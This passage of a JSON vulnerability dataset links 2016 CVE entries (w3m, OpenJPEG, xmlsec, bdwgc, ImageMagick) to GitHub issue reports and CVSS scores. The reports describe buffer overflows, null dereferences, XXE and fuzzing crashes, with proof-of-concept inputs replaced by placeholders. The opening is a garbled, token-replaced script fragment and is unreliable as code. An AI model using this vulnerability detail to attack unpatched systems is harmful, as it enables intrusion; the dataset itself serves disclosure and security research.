APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Stretch'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG pixel'=>'white'); push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG points NUMBERTAG strokewidth NUMBERTAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Edges'); $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG push( APITAG >Fx(expression NUMBERTAG u')); print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG $gradient=im >new; $gradient APITAG $x=$gradient APITAG NUMBERTAG a0ff ffff NUMBERTAG warn \"$x\" if \"$x\"; $gradient APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Stretch'); $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Filter'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG $example=$model APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Paint'); $example APITAG push( APITAG print APITAG $plasma=im >new; $plasma APITAG $x=$plasma APITAG warn \"$x\" if \"$x\"; $plasma APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG gravity=>'center'); push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Blur'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Noise'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG NUMBERTAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Contrast'); $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG APITAG $example=$model APITAG $example APITAG Mask'); $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG print APITAG $example=$model APITAG $example APITAG $example APITAG push( APITAG Create image montage. print APITAG $montage=$images APITAG APITAG ffffff', APITAG NUMBERTAG stroke=>'none', shadow=>'true'); $logo=im APITAG $logo APITAG $logo APITAG $montage APITAG print APITAG $montage APITAG $montage APITAG print APITAG $montage APITAG",
  3870. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3871. "severity": "MEDIUM",
  3872. "baseScore": 5.5,
  3873. "impactScore": 3.6,
  3874. "exploitabilityScore": 1.8
  3875. },
  3876. {
  3877. "CVE_ID": "CVE-2016-9318",
  3878. "Issue_Url_old": "https://github.com/lsh123/xmlsec/issues/43",
  3879. "Issue_Url_new": "https://github.com/lsh123/xmlsec/issues/43",
  3880. "Repo_new": "lsh123/xmlsec",
  3881. "Issue_Created_At": "2016-10-06T17:08:21Z",
  3882. "description": "xmlsec vulnerable to XXE. Description An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Whenever xmlsec verifies, encrypt, decrypt an XML document the parse by default reads external entities resulting on an XXE Vulnerability. Proof of Concept APITAG Running a fake command to test: ERRORTAG Listener: CODETAG Note: The same results were found as a result of trying to encrypt or decyrpt content. Recommendations It is my recommendation that the xmlsec library by default denies External Entities and local file inclusion and/or provides a command line option that can be used to block them.",
  3883. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  3884. "severity": "MEDIUM",
  3885. "baseScore": 5.5,
  3886. "impactScore": 3.6,
  3887. "exploitabilityScore": 1.8
  3888. },
  3889. {
  3890. "CVE_ID": "CVE-2016-9422",
  3891. "Issue_Url_old": "https://github.com/tats/w3m/issues/8",
  3892. "Issue_Url_new": "https://github.com/tats/w3m/issues/8",
  3893. "Repo_new": "tats/w3m",
  3894. "Issue_Created_At": "2016-08-11T19:32:39Z",
  3895. "description": "Stack seems smashed with large image inside table. How to reproduce CODETAG The behavior is not stable. w3m sometimes crashes and sometimes doesn't. Usually It just segfault and sometimes stack protector says stack smashed. I haven't debug it, so I don't know why it's unstable and how the stack smashed. Following is my steps to compile w3m: APITAG This is found by afl fuzz.",
  3896. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3897. "severity": "HIGH",
  3898. "baseScore": 8.8,
  3899. "impactScore": 5.9,
  3900. "exploitabilityScore": 2.8
  3901. },
  3902. {
  3903. "CVE_ID": "CVE-2016-9423",
  3904. "Issue_Url_old": "https://github.com/tats/w3m/issues/9",
  3905. "Issue_Url_new": "https://github.com/tats/w3m/issues/9",
  3906. "Repo_new": "tats/w3m",
  3907. "Issue_Created_At": "2016-08-12T11:58:50Z",
  3908. "description": "malform html tag may crash w3m. How to reproduce CODETAG gdb log ERRORTAG Looks like something overflow and overwrite \"a\" pointer. This is found by afl fuzz",
  3909. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3910. "severity": "HIGH",
  3911. "baseScore": 8.8,
  3912. "impactScore": 5.9,
  3913. "exploitabilityScore": 2.8
  3914. },
  3915. {
  3916. "CVE_ID": "CVE-2016-9424",
  3917. "Issue_Url_old": "https://github.com/tats/w3m/issues/12",
  3918. "Issue_Url_new": "https://github.com/tats/w3m/issues/12",
  3919. "Repo_new": "tats/w3m",
  3920. "Issue_Created_At": "2016-08-16T17:54:10Z",
  3921. "description": "heap out of bound write due to negative array index. How to reproduce: CODETAG Here, selectnumber could be negative, or positive but overflows to negative. The corresponding code snippet: CODETAG APITAG is the selectnumber mentioned above. It will crash at line NUMBERTAG Similar code pattern at line NUMBERTAG CODETAG",
  3922. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3923. "severity": "HIGH",
  3924. "baseScore": 8.8,
  3925. "impactScore": 5.9,
  3926. "exploitabilityScore": 2.8
  3927. },
  3928. {
  3929. "CVE_ID": "CVE-2016-9425",
  3930. "Issue_Url_old": "https://github.com/tats/w3m/issues/21",
  3931. "Issue_Url_new": "https://github.com/tats/w3m/issues/21",
  3932. "Repo_new": "tats/w3m",
  3933. "Issue_Created_At": "2016-08-19T16:05:49Z",
  3934. "description": "segfault due to write to APITAG NUMBERTAG in APITAG ERRORTAG This is found by afl fuzz",
  3935. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3936. "severity": "HIGH",
  3937. "baseScore": 8.8,
  3938. "impactScore": 5.9,
  3939. "exploitabilityScore": 2.8
  3940. },
  3941. {
  3942. "CVE_ID": "CVE-2016-9426",
  3943. "Issue_Url_old": "https://github.com/tats/w3m/issues/25",
  3944. "Issue_Url_new": "https://github.com/tats/w3m/issues/25",
  3945. "Repo_new": "tats/w3m",
  3946. "Issue_Created_At": "2016-08-21T18:34:47Z",
  3947. "description": "heap corruption due to integer overflow in APITAG This bug is interesting since it triggered libgc's issue URLTAG as well. How to reproduce APITAG gdb CODETAG This demonstrate libgc's bug. n NUMBERTAG libgc treat it as ERRORTAG NUMBERTAG The allocation should be failed (either return NULL or abort the program). But it returns NUMBERTAG df NUMBERTAG If continue to run CODETAG With further investigation, w3m's negative size comes from table.c, APITAG line NUMBERTAG APITAG where APITAG NUMBERTAG but APITAG is short . After assignment, APITAG",
  3948. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3949. "severity": "HIGH",
  3950. "baseScore": 8.8,
  3951. "impactScore": 5.9,
  3952. "exploitabilityScore": 2.8
  3953. },
  3954. {
  3955. "CVE_ID": "CVE-2016-9427",
  3956. "Issue_Url_old": "https://github.com/ivmai/bdwgc/issues/135",
  3957. "Issue_Url_new": "https://github.com/ivmai/bdwgc/issues/135",
  3958. "Repo_new": "ivmai/bdwgc",
  3959. "Issue_Created_At": "2016-08-21T11:55:16Z",
  3960. "description": "integer overflow in GC_MALLOC_ATOMIC. When call APITAG the expected behavior should be out of memory obviously and return NULL. However, libgc will return a pointer. The caller thought the allocation succeeded and started to write data into heap via the said pointer and thus heap corruption. The reason is integer overflow in macro APITAG URLTAG APITAG (sz) + HBLKSIZE NUMBERTAG overflows and become a small positive number. After the overflow, libgc allocates a small block of memory and return the pointer.",
  3961. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3962. "severity": "CRITICAL",
  3963. "baseScore": 9.8,
  3964. "impactScore": 5.9,
  3965. "exploitabilityScore": 3.9
  3966. },
  3967. {
  3968. "CVE_ID": "CVE-2016-9428",
  3969. "Issue_Url_old": "https://github.com/tats/w3m/issues/26",
  3970. "Issue_Url_new": "https://github.com/tats/w3m/issues/26",
  3971. "Repo_new": "tats/w3m",
  3972. "Issue_Created_At": "2016-08-28T15:44:14Z",
  3973. "description": "heap buffer overflow write in APITAG input CODETAG ERRORTAG pr is corrupted. Note the correct address of pr is NUMBERTAG c7f NUMBERTAG but its highest byte is overwritten by NUMBERTAG b=='[' This is because buffer overflows earlier in APITAG (several times). With following assertion, it can catch the overflow easier. CODETAG ERRORTAG",
  3974. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3975. "severity": "HIGH",
  3976. "baseScore": 8.8,
  3977. "impactScore": 5.9,
  3978. "exploitabilityScore": 2.8
  3979. },
  3980. {
  3981. "CVE_ID": "CVE-2016-9429",
  3982. "Issue_Url_old": "https://github.com/tats/w3m/issues/29",
  3983. "Issue_Url_new": "https://github.com/tats/w3m/issues/29",
  3984. "Repo_new": "tats/w3m",
  3985. "Issue_Created_At": "2016-10-03T00:58:31Z",
  3986. "description": "global buffer overflow write in APITAG input CODETAG APITAG output ERRORTAG gdb output CODETAG found by afl fuzz",
  3987. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3988. "severity": "HIGH",
  3989. "baseScore": 8.8,
  3990. "impactScore": 5.9,
  3991. "exploitabilityScore": 2.8
  3992. },
  3993. {
  3994. "CVE_ID": "CVE-2016-9430",
  3995. "Issue_Url_old": "https://github.com/tats/w3m/issues/7",
  3996. "Issue_Url_new": "https://github.com/tats/w3m/issues/7",
  3997. "Repo_new": "tats/w3m",
  3998. "Issue_Created_At": "2016-08-08T08:43:17Z",
  3999. "description": "segfault for malform APITAG tag. How to reproduce APITAG CODETAG This is found by afl fuzz.",
  4000. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4001. "severity": "MEDIUM",
  4002. "baseScore": 6.5,
  4003. "impactScore": 3.6,
  4004. "exploitabilityScore": 2.8
  4005. },
  4006. {
  4007. "CVE_ID": "CVE-2016-9431",
  4008. "Issue_Url_old": "https://github.com/tats/w3m/issues/10",
  4009. "Issue_Url_new": "https://github.com/tats/w3m/issues/10",
  4010. "Repo_new": "tats/w3m",
  4011. "Issue_Created_At": "2016-08-14T13:38:48Z",
  4012. "description": "stackoverflow in APITAG on malform input. How to reproduce: CODETAG ASAN output: ERRORTAG",
  4013. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4014. "severity": "MEDIUM",
  4015. "baseScore": 6.5,
  4016. "impactScore": 3.6,
  4017. "exploitabilityScore": 2.8
  4018. },
  4019. {
  4020. "CVE_ID": "CVE-2016-9432",
  4021. "Issue_Url_old": "https://github.com/tats/w3m/issues/13",
  4022. "Issue_Url_new": "https://github.com/tats/w3m/issues/13",
  4023. "Repo_new": "tats/w3m",
  4024. "Issue_Created_At": "2016-08-16T18:08:59Z",
  4025. "description": "crash due to bcopy with negative size. How to reproduce ERRORTAG crash because bcopy with negative size. this is found by afl fuzz",
  4026. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4027. "severity": "MEDIUM",
  4028. "baseScore": 6.5,
  4029. "impactScore": 3.6,
  4030. "exploitabilityScore": 2.8
  4031. },
  4032. {
  4033. "CVE_ID": "CVE-2016-9433",
  4034. "Issue_Url_old": "https://github.com/tats/w3m/issues/14",
  4035. "Issue_Url_new": "https://github.com/tats/w3m/issues/14",
  4036. "Repo_new": "tats/w3m",
  4037. "Issue_Created_At": "2016-08-16T18:47:09Z",
  4038. "description": "segfault when iso NUMBERTAG parsing. ERRORTAG found by afl fuzz",
  4039. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4040. "severity": "MEDIUM",
  4041. "baseScore": 6.5,
  4042. "impactScore": 3.6,
  4043. "exploitabilityScore": 2.8
  4044. },
  4045. {
  4046. "CVE_ID": "CVE-2016-9434",
  4047. "Issue_Url_old": "https://github.com/tats/w3m/issues/15",
  4048. "Issue_Url_new": "https://github.com/tats/w3m/issues/15",
  4049. "Repo_new": "tats/w3m",
  4050. "Issue_Created_At": "2016-08-16T19:14:06Z",
  4051. "description": "segfault with incorrect form_int fid. ERRORTAG this is found by afl fuzz",
  4052. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4053. "severity": "MEDIUM",
  4054. "baseScore": 6.5,
  4055. "impactScore": 3.6,
  4056. "exploitabilityScore": 2.8
  4057. },
  4058. {
  4059. "CVE_ID": "CVE-2016-9437",
  4060. "Issue_Url_old": "https://github.com/tats/w3m/issues/17",
  4061. "Issue_Url_new": "https://github.com/tats/w3m/issues/17",
  4062. "Repo_new": "tats/w3m",
  4063. "Issue_Created_At": "2016-08-17T09:37:10Z",
  4064. "description": "write access violation with ' APITAG '. CODETAG Writing to rodata section and crash. This is found by afl fuzz",
  4065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4066. "severity": "MEDIUM",
  4067. "baseScore": 6.5,
  4068. "impactScore": 3.6,
  4069. "exploitabilityScore": 2.8
  4070. },
  4071. {
  4072. "CVE_ID": "CVE-2016-9438",
  4073. "Issue_Url_old": "https://github.com/tats/w3m/issues/18",
  4074. "Issue_Url_new": "https://github.com/tats/w3m/issues/18",
  4075. "Repo_new": "tats/w3m",
  4076. "Issue_Created_At": "2016-08-17T10:38:42Z",
  4077. "description": "Null pointer dereference with input_alt tag. Null pointer dereference ERRORTAG this is found by afl fuzz",
  4078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4079. "severity": "MEDIUM",
  4080. "baseScore": 6.5,
  4081. "impactScore": 3.6,
  4082. "exploitabilityScore": 2.8
  4083. },
  4084. {
  4085. "CVE_ID": "CVE-2016-9439",
  4086. "Issue_Url_old": "https://github.com/tats/w3m/issues/20",
  4087. "Issue_Url_new": "https://github.com/tats/w3m/issues/20",
  4088. "Repo_new": "tats/w3m",
  4089. "Issue_Created_At": "2016-08-19T15:56:01Z",
  4090. "description": "infinite recursion with nested table and textarea. ERRORTAG I found w3m called APITAG earlier. This is found by afl fuzz",
  4091. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4092. "severity": "MEDIUM",
  4093. "baseScore": 6.5,
  4094. "impactScore": 3.6,
  4095. "exploitabilityScore": 2.8
  4096. },
  4097. {
  4098. "CVE_ID": "CVE-2016-9440",
  4099. "Issue_Url_old": "https://github.com/tats/w3m/issues/22",
  4100. "Issue_Url_new": "https://github.com/tats/w3m/issues/22",
  4101. "Repo_new": "tats/w3m",
  4102. "Issue_Created_At": "2016-08-19T16:58:10Z",
  4103. "description": "segfault due to dereference near null pointer in APITAG Input: CODETAG gdb trace: ERRORTAG This is found by afl fuzz",
  4104. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4105. "severity": "MEDIUM",
  4106. "baseScore": 6.5,
  4107. "impactScore": 3.6,
  4108. "exploitabilityScore": 2.8
  4109. },
  4110. {
  4111. "CVE_ID": "CVE-2016-9441",
  4112. "Issue_Url_old": "https://github.com/tats/w3m/issues/24",
  4113. "Issue_Url_new": "https://github.com/tats/w3m/issues/24",
  4114. "Repo_new": "tats/w3m",
  4115. "Issue_Created_At": "2016-08-20T13:24:56Z",
  4116. "description": "segfault due to dereference near null pointer in do_refill. input CODETAG gdb CODETAG found by afl fuzz",
  4117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4118. "severity": "MEDIUM",
  4119. "baseScore": 6.5,
  4120. "impactScore": 3.6,
  4121. "exploitabilityScore": 2.8
  4122. },
  4123. {
  4124. "CVE_ID": "CVE-2016-9443",
  4125. "Issue_Url_old": "https://github.com/tats/w3m/issues/28",
  4126. "Issue_Url_new": "https://github.com/tats/w3m/issues/28",
  4127. "Repo_new": "tats/w3m",
  4128. "Issue_Created_At": "2016-10-02T15:20:37Z",
  4129. "description": "Null pointer dereference in APITAG Input file CODETAG gdb log ERRORTAG found by afl fuzz",
  4130. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4131. "severity": "MEDIUM",
  4132. "baseScore": 6.5,
  4133. "impactScore": 3.6,
  4134. "exploitabilityScore": 2.8
  4135. },
  4136. {
  4137. "CVE_ID": "CVE-2016-9479",
  4138. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/33",
  4139. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/33",
  4140. "Repo_new": "b2evolution/b2evolution",
  4141. "Issue_Created_At": "2016-11-17T12:03:32Z",
  4142. "description": "A vulnerability to change any user's password. MENTIONTAG I find a vulnerability in version NUMBERTAG stable, an attacker can exploit this vulnerability to change other user's password. I have send a message to you in b2evolution.net with detail information. I hope this would be helpful to you to fix it.",
  4143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4144. "severity": "HIGH",
  4145. "baseScore": 7.5,
  4146. "impactScore": 3.6,
  4147. "exploitabilityScore": 3.9
  4148. },
  4149. {
  4150. "CVE_ID": "CVE-2016-9559",
  4151. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/298",
  4152. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/298",
  4153. "Repo_new": "imagemagick/imagemagick",
  4154. "Issue_Created_At": "2016-11-09T16:36:07Z",
  4155. "description": "null pointer passed as argument NUMBERTAG which is declared to never be null (tiff.c). On NUMBERTAG with the security policy enabled: ERRORTAG Testcase: URLTAG",
  4156. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4157. "severity": "MEDIUM",
  4158. "baseScore": 6.5,
  4159. "impactScore": 3.6,
  4160. "exploitabilityScore": 2.8
  4161. },
  4162. {
  4163. "CVE_ID": "CVE-2016-9572",
  4164. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/863",
  4165. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/863",
  4166. "Repo_new": "uclouvain/openjpeg",
  4167. "Issue_Created_At": "2016-11-02T14:32:30Z",
  4168. "description": "Openjpeg NUMBERTAG APITAG vulnerability due to some logic error. Overview I have found a vulnerability in openjpeg NUMBERTAG an open source JPEG NUMBERTAG codec written in C language) using AFL ( URLTAG The vulnerability exists in code responsible for decoding the input image. The vulnerability is caused by an improper assumption: if the decoding process successfully finishes, buffer of each component corresponding to each channel APITAG Green, Blue, Alpha) has already been allocated and filled with data; however, the assumption is not always valid, i.e. these buffers has not been allocated when the decoding process successfully returns. The vulnerability can be viewed as a logic error. The vulnerability can trigger many different crash points by crafting the APITAG image file and cause Denial of Service due to Null Pointer Reference. It\u2019s probably that the vulnerability can cause crashes of some other type and cause more critical impact by crafting the APITAG Analysis and APITAG The detail analysis and poc file can be found in the attachment. FILETAG Author name: twelveand0 @ VARAS of IIE org: IIE ( FILETAG Notes I have reported this to APITAG Security Team and they suggested me to report it here before assigning cve id.",
  4169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4170. "severity": "MEDIUM",
  4171. "baseScore": 6.5,
  4172. "impactScore": 3.6,
  4173. "exploitabilityScore": 2.8
  4174. },
  4175. {
  4176. "CVE_ID": "CVE-2016-9573",
  4177. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/862",
  4178. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/862",
  4179. "Repo_new": "uclouvain/openjpeg",
  4180. "Issue_Created_At": "2016-11-02T14:24:56Z",
  4181. "description": "Openjpeg NUMBERTAG Heap Buffer Overflow Vulnerability due to Insufficient check. overview I have found a vulnerability in openjpeg NUMBERTAG an open source JPEG NUMBERTAG codec written in C language) using AFL ( URLTAG The vulnerability is an heap buffer overflow vulnerability, which can cause out of bound read. The vulnerability exists in code responsible for decompressing the input image. The vulnerability is caused by insufficient check: the code have made sure the parameters of RED channel, GREEN channel and BLUE channel are the same, however, does not do it for ALPHA channel, which causes the length of alpha buffer is less than the expected access length. The vulnerability can cause Denial of Service and Information Disclosure and I am not sure whether it can cause RCE. Analysis and APITAG The detail analysis and poc file can be found in the attachment. FILETAG Author name: twelveand0 @ VARAS of IIE org: IIE ( FILETAG Notes I have reported this to APITAG Security Team and they suggested me to report it here before assigning cve id.",
  4182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  4183. "severity": "HIGH",
  4184. "baseScore": 8.1,
  4185. "impactScore": 5.2,
  4186. "exploitabilityScore": 2.8
  4187. },
  4188. {
  4189. "CVE_ID": "CVE-2016-9580",
  4190. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/871",
  4191. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/871",
  4192. "Repo_new": "uclouvain/openjpeg",
  4193. "Issue_Created_At": "2016-12-07T13:47:43Z",
  4194. "description": "out of bound write issue caused by integer overflow that can occur in function APITAG PATHTAG ).. DESCRIPTION There is an out of bound write issue caused by integer overflow that can occur in function APITAG PATHTAG ). VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fffffff7d NUMBERTAG sp NUMBERTAG fffffff7d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f NUMBERTAG in convert NUMBERTAG u NUMBERTAG s_C1R PATHTAG NUMBERTAG ab in tiftoimage PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG ffff5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Author name: chunibalon of VARAS MENTIONTAG email: EMAILTAG",
  4195. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4196. "severity": "HIGH",
  4197. "baseScore": 8.8,
  4198. "impactScore": 5.9,
  4199. "exploitabilityScore": 2.8
  4200. },
  4201. {
  4202. "CVE_ID": "CVE-2016-9581",
  4203. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/872",
  4204. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/872",
  4205. "Repo_new": "uclouvain/openjpeg",
  4206. "Issue_Created_At": "2016-12-07T13:50:10Z",
  4207. "description": "out of bound write issue can occur in function convert NUMBERTAG s_C1P1 ( PATHTAG ). DESCRIPTION There is an out of bound write issue can occur in function convert NUMBERTAG s_C1P1 ( PATHTAG APITAG other functions like covert_ _ with trigger this problem). This issue can be caused by a malformed TIFF file. VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG ffff6ef NUMBERTAG bp NUMBERTAG fffffff7d NUMBERTAG sp NUMBERTAG fffffff NUMBERTAG d8 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG ffff6ef NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG in convert NUMBERTAG s_C1P1 PATHTAG NUMBERTAG ce in tiftoimage PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG ffff5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Author name: bobb, chunibalon of VARAS MENTIONTAG email: EMAILTAG",
  4208. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4209. "severity": "HIGH",
  4210. "baseScore": 8.8,
  4211. "impactScore": 5.9,
  4212. "exploitabilityScore": 2.8
  4213. },
  4214. {
  4215. "CVE_ID": "CVE-2016-9622",
  4216. "Issue_Url_old": "https://github.com/tats/w3m/issues/32",
  4217. "Issue_Url_new": "https://github.com/tats/w3m/issues/32",
  4218. "Repo_new": "tats/w3m",
  4219. "Issue_Created_At": "2016-11-06T15:05:02Z",
  4220. "description": "null pointer dereference in APITAG input CODETAG gdb log ERRORTAG",
  4221. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4222. "severity": "MEDIUM",
  4223. "baseScore": 6.5,
  4224. "impactScore": 3.6,
  4225. "exploitabilityScore": 2.8
  4226. },
  4227. {
  4228. "CVE_ID": "CVE-2016-9623",
  4229. "Issue_Url_old": "https://github.com/tats/w3m/issues/33",
  4230. "Issue_Url_new": "https://github.com/tats/w3m/issues/33",
  4231. "Repo_new": "tats/w3m",
  4232. "Issue_Created_At": "2016-11-06T15:47:23Z",
  4233. "description": "crash after allocate string of negative size. input CODETAG crash location ERRORTAG With further debugging, I found the value APITAG is coming from the result of APITAG At APITAG line NUMBERTAG of table.c, the result of APITAG APITAG",
  4234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4235. "severity": "MEDIUM",
  4236. "baseScore": 6.5,
  4237. "impactScore": 3.6,
  4238. "exploitabilityScore": 2.8
  4239. },
  4240. {
  4241. "CVE_ID": "CVE-2016-9624",
  4242. "Issue_Url_old": "https://github.com/tats/w3m/issues/35",
  4243. "Issue_Url_new": "https://github.com/tats/w3m/issues/35",
  4244. "Repo_new": "tats/w3m",
  4245. "Issue_Created_At": "2016-11-07T08:24:22Z",
  4246. "description": "dereference near null pointer in APITAG input CODETAG APITAG ERRORTAG found by afl fuzz",
  4247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4248. "severity": "MEDIUM",
  4249. "baseScore": 6.5,
  4250. "impactScore": 3.6,
